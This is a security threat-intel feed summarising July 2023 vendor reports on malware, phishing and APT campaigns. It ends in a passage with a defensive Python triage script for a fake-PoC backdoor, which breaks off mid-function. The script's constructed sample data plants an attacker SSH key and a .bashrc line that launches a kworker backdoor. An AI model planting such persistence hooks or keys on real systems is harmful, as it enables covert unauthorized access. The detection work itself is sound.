- Cyfirma
- Intel Name:
- Hackers_Behind_Big_Head_and_Poop69_Ransomware_Are_DEV0970_Storm_0970
- Date of Scan:
- 2023-07-26
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has observed Poop69 ransomware appearing in the wild. Shortly afterwards, another ransomware named BIG HEAD emerged, thought to originate from the same threat actor; it has become popular recently due to its fake Windows update method.
—
- Intel Source:
- Avast
- Intel Name:
- The_Dangers_of_Downloading_Illegal_Software_and_the_Hidden_AutoHotkey_Script
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- In a recent rise in malware activity, malicious AutoHotkey scripts that launched the HotRat malware on victims’ PCs were bundled with illicit software, according to Avast researchers. This malware spreads via open repositories, with URLs being shared on social media and online discussion boards.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Spearphishing_Campaign_Targeting_Zimbra_Webmail_Portals_of_Government_Organizations
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- Researchers at EclecticIQ have discovered a spearphishing effort that uses vulnerable Zimbra and Roundcube email servers to target governmental institutions. The effort began in January 2023 and has primarily targeted Ukrainian government organizations, though it has also targeted Spain, Indonesia, and France.
—
- Intel Source:
- SentinelOne
- Intel Name:
- JumpCloud_Intrusion_linked_to_North_Korean_APT_Activity
- Date of Scan:
- 2023-07-26
- Impact:
- MEDIUM
- Summary:
- SentinelOne shared the details after investigation and attributed this attack to an unnamed “sophisticated nation-state sponsored threat actor”. Additionally, updated IOCs were released and researchers associated the cluster of threat activity with a North Korean state-sponsored APT. The IOCs are linked to a wide variety of activity that SentinelOne attributes to the DPRK, overall centred on the supply chain targeting approach seen in previous campaigns.
—
- Intel Source:
- HP Labs
- Intel Name:
- Cybercriminals_Using_Ads_to_Spread_IcedID_and_Infostealers
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Researchers from HP Labs have observed two major malware campaigns delivering Vidar Stealer and IcedID, both of which use malvertising and imitate well-known software. They have also seen other families distributed using this method, including BatLoader and Rhadamanthys Stealer, indicating the growing popularity of this delivery mechanism among threat actors.
Source:
https://threatresearch.ext.hp.com/adverts-mimicking-popular-software-leads-to-malware/?web_view=true
—
- Intel Source:
- JPCERT/CC
- Intel Name:
- DangerousPasswords_Python_and_Nodejs_Malware_Across_Platforms
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- JPCERT/CC has shared that DangerousPassword, a targeted attack group, is targeting developers of cryptocurrency exchange businesses on Windows, macOS, and Linux environments. They use Python and Node.js malware to infect systems. The malware downloads and executes MSI files (Windows) and Python files (macOS, Linux) from external sources, communicating with a C2 server every minute.
Source:
https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- Turla_Attacks_Using_CAPIBAR_and_KAZUAR_Malware
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered that, in addition to the use of XSLT (Extensible Stylesheet Language Transformations) and COM hijacking, the distinguishing feature of CAPIBAR is the presence of a server component, which is typically installed on infected MS Exchange servers in the form of a MOF (Managed Object Format) file using the Desired State Configuration (DSC) PowerShell tool, effectively converting a legitimate server into a malware control center.
—
- Intel Source:
- Securelist
- Intel Name:
- Outlook_Vulnerability_and_Clever_Attacker_Tactics
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Securelist shared their analysis of the CVE-2023-23397 vulnerability in Microsoft Outlook for Windows, which allowed attackers to leak Net-NTLMv2 hashes by sending malicious objects. Samples exploiting this flaw targeted various entities from March 2022 to March 2023. Attackers used compromised ISP routers for hosting fake SMB servers.
Source:
https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Campaign_Distributing_NetSupport_RAT_Through_Fake_Browser_Updates
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have observed a new campaign called FakeSG that is distributing the NetSupport RAT through hacked WordPress websites. It uses fake browser update templates to deceive users. The payload is delivered via Internet shortcuts or zipped downloads.
—
- Intel Source:
- Fortinet
- Intel Name:
- Threat_Actors_Embrace_ZIP_Domains_in_Deceptive_Attacks
- Date of Scan:
- 2023-07-25
- Impact:
- LOW
- Summary:
- FortiGate researchers have observed threat actors using the new ‘.ZIP’ Top-Level Domain (TLD) to launch sophisticated phishing attacks. These domains can trick users into thinking they are downloading files when they’re actually visiting malicious websites.
Source:
https://www.fortinet.com/blog/industry-trends/threat-actors-add-zip-domains-to-phishing-arsenals
—
- Intel Source:
- Checkpoint
- Intel Name:
- BundleBot_A_Stealthy_Threat_Abusing_Self_Contained_Dotnet_Format
- Date of Scan:
- 2023-07-25
- Impact:
- MEDIUM
- Summary:
- Check Point Research (CPR) conducted an analysis of a new malware strain called BundleBot, which is spreading covertly. BundleBot uses the dotnet bundle (single-file), self-contained format, making static detection challenging. The malware is commonly distributed via Facebook Ads and compromised accounts, masquerading as legitimate program utilities, AI tools, and games.
Source:
https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/
—
- Intel Source:
- Permiso
- Intel Name:
- Agile_Approach_to_Mass_Cloud_Credential_Harvesting_and_Crypto_Mining_Sprints_Ahead
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Permiso have observed attackers using an agile approach to mass cloud credential harvesting and crypto mining. They developed and deployed incremental iterations of their malware, targeting multiple cloud services. The campaign includes multi-cloud support, possible German-speaking actors, and hosting on Nice VPS.
—
- Intel Source:
- Symantec
- Intel Name:
- Modified_Sardonic_Backdoor_by_FIN8_Group
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Symantec researchers have found evidence of the financially motivated threat actor known as FIN8 employing a “revamped” variation of the Sardonic backdoor to spread the BlackCat ransomware.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/Syssphinx-FIN8-backdoor
—
- Intel Source:
- Sonatype
- Intel Name:
- NullRAT_InfoStealer_Targeting_PyPI_Package_for_Windows
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Sonatype’s automated malware detection systems discovered sonatype-2023-2950, a malicious PyPI package with the name “feur,” which has since been taken down.
—
- Intel Source:
- Cofense
- Intel Name:
- The_Use_of_HTML_Attachments_in_Phishing_Campaigns_Has_Increased
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Cofense have observed developments in the phishing and email security scene. The use of HTML attachments in dangerous phishing attempts has increased significantly, by 168% and 450%, respectively, compared to both Q1 and Q2 of the preceding two years.
Source:
https://cofense.com/blog/html-attachments-used-in-malicious-phishing-campaigns/
—
- Intel Source:
- Rapid7
- Intel Name:
- Exploiting_Several_Adobe_ColdFusion_Vulnerabilities_Actively
- Date of Scan:
- 2023-07-24
- Impact:
- LOW
- Summary:
- Researchers from Rapid7 have discovered that criminals are actively taking advantage of two ColdFusion flaws to circumvent authentication, remotely execute commands, and install webshells on vulnerable servers. Threat actors are combining exploits for the critical remote code execution vulnerability CVE-2023-38203 and the access control bypass vulnerability CVE-2023-29298.
—
- Intel Source:
- Microsoft
- Intel Name:
- The_deeper_details_of_Storm_0558_techniques_for_unauthorized_access
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Earlier this month, Microsoft shared detailed information about a malicious campaign by the threat actor Storm-0558 that targeted customer email. Microsoft continued their investigation into this incident and deployed defense in depth to harden all systems involved; additionally, they are providing a deeper analysis of the observed actor techniques for obtaining unauthorized access to email data, the tools used, and unique infrastructure characteristics.
—
- Intel Source:
- Netskope
- Intel Name:
- AWS_Amplify_Hosted_Phishing_Campaigns
- Date of Scan:
- 2023-07-23
- Impact:
- LOW
- Summary:
- Over the last couple of months, Netskope Threat Labs researchers observed an increase in traffic to phishing pages hosted on AWS Amplify. These attacks have been targeting victims across different segments, led by the technology and finance verticals.
Source:
https://www.netskope.com/de/blog/aws-amplify-hosted-phishing-campaigns-abusing-telegram-static-forms
—
- Intel Source:
- BleepingComputer, JumpCloud
- Intel Name:
- JumpCloud_had_a_breach_by_state_backed_APT_hacking_group
- Date of Scan:
- 2023-07-23
- Impact:
- MEDIUM
- Summary:
- US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. The company discovered the incident on June 27, one week after the attackers breached its systems via a spear-phishing attack. On July 5, JumpCloud discovered “unusual activity in the commands framework for a small set of customers” while investigating the attack and analyzing logs for signs of malicious activity.
Source:
https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/
https://jumpcloud.com/support/july-2023-iocs
—
- Intel Source:
- Perception Point
- Intel Name:
- A_complex_phishing_operation_Manipulated_Caiman
- Date of Scan:
- 2023-07-22
- Impact:
- LOW
- Summary:
- Perception Point investigated a complex phishing operation called “Manipulated Caiman”. The threat actor was named Manipulated Caiman based on one of the files analyzed, which contained the words “Loader Manipulado” in its PDB path. The attacker’s origin is likely Latin America. Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, an SMTP bruteforce client, a malicious extension installer, a net info checker, and a spammer client.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- The_delivery_of_BlotchyQuasar_malware
- Date of Scan:
- 2023-07-22
- Impact:
- MEDIUM
- Summary:
- IBM Security X-Force discovered some phishing emails leading to packed executable files delivering malware called BlotchyQuasar, likely developed by a group X-Force tracks as Hive0129. BlotchyQuasar is hardcoded to collect credentials from multiple Latin American-based banking applications and websites used within public and private environments.
—
- Intel Source:
- eSentire
- Intel Name:
- The_Delivery_of_Sorillus_RAT
- Date of Scan:
- 2023-07-21
- Impact:
- LOW
- Summary:
- eSentire researchers have identified Sorillus RAT and a phishing page being delivered using HTML-smuggled files and links hosted on Google’s Firebase Hosting service.
Source:
https://www.esentire.com/blog/google-firebase-hosting-abused-to-deliver-sorillus-rat-phishing-page
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_High_Evasive_Blank_Grabber_Returns
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified an infostealer builder known as ‘Blank Grabber’. It was released in 2022; since then, it has been frequently updated, with 85 contributions to the project in the last month alone. The infostealer targets Windows operating systems and possesses a wide range of capabilities aimed at stealing sensitive information from unsuspecting users.
Source:
https://www.cyfirma.com/outofband/blank-grabber-returns-with-high-evasiveness/
—
- Intel Source:
- Fortinet
- Intel Name:
- Diving_Deep_into_Rancoz_Ransomware
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- FortiGate researchers note that the Rancoz ransomware first came to the public’s attention a few months ago. However, it is important to raise awareness of this ransomware variant, as the most recent victim on its TOR data leak site dates back just a few weeks, to mid-June.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-rancoz
—
- Intel Source:
- Citizenlab
- Intel Name:
- The_Analysis_of_HKLEAKS_Campaign
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Researchers from Citizen Lab have conducted a forensic analysis of the entire identifiable digital footprint of the HKLEAKS campaign. In August 2019, at the height of the Anti-Extradition Bill protests that rocked Hong Kong, a series of websites branded “HKLEAKS” began surfacing on the web. Claiming to be run by anonymous citizens, they systematically exposed (“doxxed”) the personal identifiable information of protesters, journalists, and other individuals perceived as affiliated with the protest movement.
—
- Intel Source:
- Vadesecure
- Intel Name:
- M365_Phishing_Email_Analysis
- Date of Scan:
- 2023-07-20
- Impact:
- LOW
- Summary:
- Vade’s researchers have detected a new Microsoft 365 phishing attack and analyzed an email containing a malicious HTML attachment.
Source:
https://www.vadesecure.com/en/blog/m365-phishing-email-analysis-eevilcorp
—
- Intel Source:
- CERT-HR
- Intel Name:
- WordPress_Plugin_ULTIMATE_MEMBER_Is_Vulnerable
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- CERT-HR researchers report that ‘Ultimate Member’, a plugin that allows registration and management of communities on WordPress sites, has a critical vulnerability (CVE-2023-3460) rated 9.8. All versions of the plugin, which has more than 200,000 active installations, are vulnerable.
—
- Intel Source:
- Trustwave
- Intel Name:
- Enterprise_Applications_Honeypot_revealed_some_findings
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Trustwave researchers have established a network of honeypot sensors across six countries: Russia, Ukraine, Poland, the UK, China, and the United States. They also present the most intriguing findings from their research into exposing vulnerable enterprise applications, such as Fortra GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian Bitbucket, and F5 BIG-IP.
—
- Intel Source:
- Uptycs
- Intel Name:
- Fake_PoC_for_Linux_Kernel_Vulnerability_on_GitHub
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Cybersecurity researchers continue to be targeted by malicious actors: a proof-of-concept (PoC) has been discovered on GitHub concealing a backdoor with a “crafty” persistence method.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_activities_of_the_UAC_0010_group_as_of_July_2023
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The continuous accumulation and analysis of data on cyber incidents allows us to conclude that one of the most persistent cyber threats is UAC-0010 (Armageddon), the activities of which are carried out by former “officers” of the State Security Service of Crimea, who in 2014 betrayed their military oath and began to serve the FSB of Russia. The main task of the group is cyberespionage against the security and defense forces of Ukraine. At the same time, we know at least one case of destructive activity at an information infrastructure facility.
—
- Intel Source:
- KrebsonSecurity
- Intel Name:
- DomainNetworks_Mail_Scam
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from KrebsOnSecurity have identified DomainNetworks as a fraudulent company behind a snail mail scam targeting domain owners. Its true operators remain unidentified, despite connections to thedomainsvault.com and UBSagency. These scams trick organizations into paying for unnecessary services.
—
- Intel Source:
- Kaspersky, Palant
- Intel Name:
- Malicious_extensions_in_Chrome_Web_Store
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- The subpage of the Kaspersky official blog discusses the discovery of malicious extensions in the Chrome Web Store with a total of 87 million downloads. The most popular extension, “Autoskip for Youtube,” had nine million downloads. Users are advised to check and uninstall any malicious extensions as they can access user data.
Source:
https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/
https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
—
- Intel Source:
- Lab52
- Intel Name:
- New_Invitation_From_APT29_to_Use_CCleaner
- Date of Scan:
- 2023-07-19
- Impact:
- LOW
- Summary:
- Researchers from Lab52 have seen a phishing effort that appears to be the Norwegian embassy inviting people to a party. This particular “invitation” is in .svg format. When the file is opened, a script is run that downloads and mounts an ISO file containing the subsequent infection stage. In this manner the .svg file serves as an HTML smuggler, infecting the target and moving the infection on to the subsequent stage.
Source:
https://lab52.io/blog/2344-2/
—
- Intel Source:
- Rapid7
- Intel Name:
- Old_Blackmoon_Trojan_NEW_Monetization_Approach
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Rapid7 has discovered a new campaign using the Blackmoon trojan targeting businesses in the USA and Canada. This campaign focuses on implementing evasion and persistence techniques, such as disabling Windows Defender. The trojan uses various persistence techniques, process injection, and exploits for remote services. It disables security tools, hijacks resources, and communicates with a Command and Control server using web protocols. The webpage includes file names, MD5 hashes, email addresses, a reference to a C&C server, and a link to a related article on monitor persistence.
Source:
https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/
—
- Intel Source:
- Sysdig
- Intel Name:
- SCARLETEEL_2
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Sysdig observed the most recent activities of a new version, SCARLETEEL 2.0. The analysts saw a strategy similar to the one previously reported: compromise AWS accounts by exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped. From the details known about SCARLETEEL previously, it was discovered they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.
—
- Intel Source:
- Sucuri
- Intel Name:
- A_variant_of_a_common_malware_injection
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- A recent investigation found malware injecting obfuscated JavaScript into legitimate files, redirecting website traffic to a parked domain for ad monetization. The injected script creates an invisible iframe from the parked domain, generating ad revenue and potentially redirecting visitors to questionable sites.
Source:
https://blog.sucuri.net/2023/07/malicious-injection-redirects-traffic-to-parked-domain.html
—
- Intel Source:
- Symantec, Cyble
- Intel Name:
- Microsoft_ZeroDay_Vulnerability_Exploited_by_Attackers
- Date of Scan:
- 2023-07-18
- Impact:
- HIGH
- Summary:
- Attackers are making use of a zero-day vulnerability (CVE-2023-36884) that affects Microsoft Windows and Office products. The exploit has so far been applied in extremely targeted attacks against businesses in the European and North American government and defense industries.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-zeroday-exploit
https://blog.cyble.com/2023/07/12/microsoft-zero-day-vulnerability-cve-2023-36884-being-actively-exploited/
—
- Intel Source:
- FACCT
- Intel Name:
- RedCurl_Hackers_Return_to_Spy_on_Major_Russian_Banks
- Date of Scan:
- 2023-07-18
- Impact:
- MEDIUM
- Summary:
- According to FACCT, the Russian-speaking RedCurl group has attacked businesses in the UK, Germany, Canada, Norway, Ukraine, and Australia at least 34 times. Twenty of the attacks—more than half—took place in Russia. Construction, financial, consultancy, retail, banking, insurance, and legal enterprises were among the victims of cyber espionage.
Source:
https://www.facct.ru/blog/redcurl-2023/?utm_source=twitter&utm_campaign=redcurl-23&utm_medium=social
—
- Intel Source:
- Wordfence
- Intel Name:
- Massive_Targeted_Exploit_Campaign_Against_WooCommerce_Payments
- Date of Scan:
- 2023-07-18
- Impact:
- LOW
- Summary:
- Wordfence researchers have identified an ongoing exploit campaign targeting a vulnerability in the WooCommerce Payments plugin. Attackers can gain administrative privileges on vulnerable websites. Wordfence provides protection against this vulnerability.
—
- Intel Source:
- Talos
- Intel Name:
- Malicious_Campaigns_Targeting_Civilian_Military_and_Governmental_Organisations
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Talos have identified a threat actor who has been running various campaigns in Poland and Ukraine against civilian users, military groups, and governmental institutions. They determined that these actions are most likely carried out with the intent to steal data and gain ongoing remote access.
Source:
https://blog.talosintelligence.com/malicious-campaigns-target-entities-in-ukraine-poland/
—
- Intel Source:
- Fortinet
- Intel Name:
- Microsoft_Office_Vulnerabilities_and_Macros_Used_by_LokiBot_Campaign
- Date of Scan:
- 2023-07-17
- Impact:
- MEDIUM
- Summary:
- Several malicious Microsoft Office documents created to take advantage of known vulnerabilities have been found by FortiGate researchers. Specifically, the documents exploit the remote code execution flaws CVE-2021-40444 and CVE-2022-30190. By taking advantage of these flaws, the attackers were able to insert malicious macros into Microsoft documents that, when opened, installed the LokiBot malware on the victim’s computer.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Credential_Stealer_Expands_to_Azure_GCP_from_AWS
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- This report shows the development of an experienced cloud actor who is knowledgeable about a variety of technologies. The actor apparently underwent a great deal of trial and error, as evidenced by decisions like feeding the curl binary to systems that do not already have it. Additionally, the actor has enhanced the tool’s data layout to promote more autonomous engagement, displaying a certain amount of maturity and proficiency.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Beware_of_Cloaked_Ursa_Phishing_Scam
- Date of Scan:
- 2023-07-17
- Impact:
- LOW
- Summary:
- Unit 42 researchers have observed instances of Cloaked Ursa using lures focusing on the diplomats themselves more than the countries they represent. They also identified Cloaked Ursa targeting diplomatic missions within Ukraine by leveraging something that all recently placed diplomats need – a vehicle.
Source:
https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
—
- Intel Source:
- Lumen
- Intel Name:
- Exploring_AVrecon_Underground_Routers
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Another multi-year scheme involving infected routers all around the world is discovered by Lumen Black Lotus Labs. Small-office/home-office (SOHO) routers are infected as part of a sophisticated operation that uses the Linux-based Remote Access Trojan (RAT) known as “AVrecon.”
Source:
https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/
—
- Intel Source:
- Aquasec
- Intel Name:
- Introducing_TeamTNT_New_Cloud_Campaign
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- AquaSec researchers have uncovered an emerging campaign that is targeting exposed Docker APIs and JupyterLab instances. Upon further investigation of the infrastructure, they found evidence of a broader campaign orchestrated by TeamTNT.
Source:
https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign
—
- Intel Source:
- AT&T
- Intel Name:
- Attackers_Leveraging_OneNote_to_Deliver_Malware
- Date of Scan:
- 2023-07-16
- Impact:
- LOW
- Summary:
- Malware distributed using phishing emails with a OneNote attachment has increased since December 22nd, 2022. The end user opens the OneNote attachment, as they do with most phishing emails, but OneNote does not support macros the way Microsoft Word or Excel do. Threat actors have historically used this method to launch programs that install malware.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Modify_TeamViewer_Installer_to_Deliver_njRAT
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from Cyble have discovered a noteworthy occurrence involving the false use of a TeamViewer program file. A popular software program called TeamViewer enables remote control, desktop sharing, online meetings, file transfers, and group collaboration across numerous devices.
Source:
https://blog.cyble.com/2023/07/13/trojanized-application-preying-on-teamviewer-users/
—
- Intel Source:
- ThreatFabric
- Intel Name:
- A_New_Sophisticated_Toolkit_For_Vishing_Called_Letscall
- Date of Scan:
- 2023-07-15
- Impact:
- LOW
- Summary:
- Researchers from ThreatFabric have identified a new sophisticated vishing toolset called Letscall, which is currently targeting individuals from South Korea.
Source:
https://www.threatfabric.com/blogs/letscall-new-sophisticated-vishing-toolset
—
- Intel Source:
- Mandiant
- Intel Name:
- Stealing_Secrets_With_Infected_USB_Drives
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- Mandiant researchers have observed a threefold increase in the number of attacks using infected USB drives to steal secrets. One campaign, named ‘Sogu,’ is attributed to the Chinese espionage threat group ‘TEMP.HEX’; another, named ‘Snowydrive,’ is attributed to UNC4698 and targets oil and gas firms in Asia.
Source:
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets
—
- Intel Source:
- CERT-UA
- Intel Name:
- SmokeLoader_Distribution_via_Email
- Date of Scan:
- 2023-07-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a mass mailing of electronic messages with the subject “Invoice” and an attachment in the form of the file “Act_Zvirky_ta_rah.fakt_vid_12_07_2023.zip” containing the VBS file “invoice_from_12_07_2023_to_payment .vbs “, the opening of which will ensure that the SmokeLoader malware is downloaded and launched.
—
- Intel Source:
- TrendMicro
- Intel Name:
- BPFDoor_Backdoor_Variants_Abusing_BPF_Filters
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- BPFDoor has since become more difficult to detect due to the improved usage of Berkeley Packet Filter (BPF), a technology that allows programs to attach network filters to an open socket that’s being used by the threat actors behind BPFDoor to bypass firewalls’ inbound traffic rules and similar network protection solutions in Linux and Solaris operating systems (OS).
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malicious_Extension
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- The specific information on this subpage includes a password-protected RAR archive with the passwords 888 or 999. An MSI file has been analyzed, and it is mentioned that Malwarebytes EDR and MDR can remove ransomware remnants and prevent reinfection. There is also a free trial available for Malwarebytes’ cybersecurity services.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Threat_Group_Using_Chrome_Remote_Desktop
- Date of Scan:
- 2023-07-14
- Impact:
- LOW
- Summary:
- ASEC researchers have observed the use of Chrome Remote Desktop by the Kimsuky threat group, supported by North Korea, for their attacks. The group utilizes their own AppleSeed malware, as well as other remote control tools like Meterpreter and VNC, to gain control over infected systems. The Kimsuky group mainly distributes malware through spear phishing emails containing HWP and MS Office document files or CHM files. They also use Infostealer to gather sensitive information.
—
- Intel Source:
- Huntress
- Intel Name:
- Business_Email_Compromise_hunting_details
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The subpage specifically discusses threat hunting for business email compromise (BEC) using user agents on Microsoft 365. The author shares their approach and examples of suspicious user agents. They emphasize the importance of baselining user behavior, detection technology, and prevention measures like multi-factor authentication.
Source:
https://www.huntress.com/blog/threat-hunting-for-business-email-compromise-through-user-agents
—
- Intel Source:
- Wiz
- Intel Name:
- The_cloud_workloads_targeted_by_Python_based_fileless_malware
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- This subpage discusses the PyLoose fileless malware that targets cloud workloads. It provides information on the attack flow, including initial access, Python script drop, fileless execution, and in-memory XMRig execution. It mentions the attacker’s Monero wallet address and provides details about the PyLoose loader’s associated files and hash values. The subpage also references other articles and promotes the Wiz platform for cloud security.
Source:
https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads
—
- Intel Source:
- Talos
- Intel Name:
- RedDriver_targets_Chinese_speakers_and_internet_cafes
- Date of Scan:
- 2023-07-13
- Impact:
- LOW
- Summary:
- The specific information on this subpage describes an undocumented browser hijacker called RedDriver. It explains that RedDriver targets Chinese speakers and internet cafes, and uses the Windows Filtering Platform to intercept browser traffic. It bypasses driver signature enforcement policies and utilizes stolen certificates. The authors of RedDriver are skilled in driver development and have deep knowledge of the Windows operating system. The subpage also includes a list of domains associated with RedDriver and provides various software and support resources offered by Talos.
Source:
https://blog.talosintelligence.com/undocumented-reddriver/
—
- Intel Source:
- Blackberry
- Intel Name:
- The_suspicion_of_targeting_Ukraine_s_NATO_Membership_Talks_by_RomCom_Threat_Actor
- Date of Scan:
- 2023-07-12
- Impact:
- MEDIUM
- Summary:
- At the beginning of this month, BlackBerry threat researchers found two malicious documents sent from an IP address in Hungary: one sent as bait to an organization supporting Ukraine abroad, and one targeting guests of the upcoming NATO Summit. BlackBerry’s analysis attributes this operation to the threat actor known as RomCom. Based on BlackBerry’s internal network data and the full set of cyber tools collected, the threat actor behind this campaign is believed to have run its first drills on June 22, a few days before the command-and-control (C2) mentioned in the report was registered and went live.
Source:
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
—
- Intel Source:
- Uptycs
- Intel Name:
- Deceptive_PoC_poses_hidden_backdoor
- Date of Scan:
- 2023-07-12
- Impact:
- LOW
- Summary:
- Uptycs researchers discovered a backdoor, disguised as an innocuous learning tool (a fake proof-of-concept exploit), that targets Linux systems. Remediation: remove unauthorized SSH keys, delete the kworker file, remove the kworker path from the .bashrc file, and check /tmp/.iCE-unix.pid for signs of compromise. Exercise caution when testing PoCs and use isolated environments.
Source:
https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
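The four remediation checks above, as an added triage script (not Uptycs’ code). It takes the home directory of the account that ran the fake PoC and the host’s /tmp as arguments; the on-disk location of the dropped kworker file is not stated in the summary, so the scan looks for any file with that name under the home directory (assumption). The sample home directory it builds is constructed data showing all four indicators.

```python
"""Host triage for the indicators named in the Uptycs write-up (added example)."""
import os
import tempfile

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def read_lines(path):
    """Lines of a text file, or [] if it does not exist."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read().splitlines()
    except FileNotFoundError:
        return []


def key_material(entry):
    """'<type> <base64>' from an authorized_keys line; options and comment are ignored."""
    fields = entry.split()
    for i in range(len(fields) - 1):
        if fields[i].startswith(KEY_TYPE_PREFIXES):
            return fields[i] + " " + fields[i + 1]
    return None


def unauthorized_ssh_keys(home, allowed_keys):
    """authorized_keys entries whose key material is not in the owner's allow-list."""
    findings = []
    for line in read_lines(os.path.join(home, ".ssh", "authorized_keys")):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if key_material(line) not in allowed_keys:
            findings.append(line)
    return findings


def bashrc_kworker_lines(home):
    """.bashrc lines that reference the kworker path (the persistence hook)."""
    return [l for l in read_lines(os.path.join(home, ".bashrc")) if "kworker" in l]


def kworker_files(home):
    """Every file literally named 'kworker' below the home directory (assumed location)."""
    return [os.path.join(d, n) for d, _, files in os.walk(home) for n in files if n == "kworker"]


def ice_unix_pid(tmp_dir):
    """Contents of <tmp>/.iCE-unix.pid, or None when the file is absent."""
    path = os.path.join(tmp_dir, ".iCE-unix.pid")
    if not os.path.isfile(path):
        return None
    return "".join(read_lines(path)).strip()


def scan(home, tmp_dir, allowed_keys):
    return {
        "unauthorized_ssh_keys": unauthorized_ssh_keys(home, allowed_keys),
        "bashrc_kworker_lines": bashrc_kworker_lines(home),
        "kworker_files": kworker_files(home),
        "ice_unix_pid": ice_unix_pid(tmp_dir),
    }


def build_sample_host(base):
    """Constructed sample: a home dir and tmp dir showing all four indicators (fake data)."""
    home, tmp_dir = os.path.join(base, "home"), os.path.join(base, "tmp")
    os.makedirs(os.path.join(home, ".ssh"))
    os.makedirs(os.path.join(home, ".local"))
    os.makedirs(tmp_dir)
    with open(os.path.join(home, ".ssh", "authorized_keys"), "w") as fh:
        fh.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOwnerKeyPlaceholder owner@laptop\n")
        fh.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCAttackerKeyPlaceholder attacker\n")
    with open(os.path.join(home, ".bashrc"), "w") as fh:
        fh.write("alias ll='ls -l'\n/home/user/.local/kworker &\n")
    with open(os.path.join(home, ".local", "kworker"), "w") as fh:
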